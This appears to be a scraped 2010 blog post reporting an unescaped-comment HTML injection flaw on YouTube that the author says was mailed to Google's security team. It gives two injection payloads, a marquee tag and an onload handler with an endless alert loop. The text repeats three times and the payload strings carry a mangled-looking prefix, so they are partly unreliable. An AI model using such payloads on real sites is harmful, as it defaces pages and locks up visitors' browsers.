<script>IF_HTML_FUNCTION?<marquee><b>Woot!<script>
Supposedly, this XSS attack works too, but I couldn't confirm it:
<script>IF_HTML_FUNCTION?<body onload="while(1){ alert('Woot!'); }"><script>
Edit: Reddit has a good discussion on it.
Sunday, July 4, 2010
XSS on youtube
I just wrote a mail to the google security team, but I'm sure they're aware of it already anyways. I was telling them about a html injection attack on youtube that's going on. Apparently comments aren't properly escaped so this will actually put a marquee on the page:
<script>IF_HTML_FUNCTION?<marquee><b>Woot!<script>
Supposedly, this XSS attack works too, but I couldn't confirm it:
<script>IF_HTML_FUNCTION?<body onload="while(1){ alert('Woot!'); }"><script>
Edit: Reddit has a good discussion on it.
<script>IF_HTML_FUNCTION?<marquee><b>Woot!<script>
Supposedly, this XSS attack works too, but I couldn't confirm it:
<script>IF_HTML_FUNCTION?<body onload="while(1){ alert('Woot!'); }"><script>
Edit: Reddit has a good discussion on it.
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment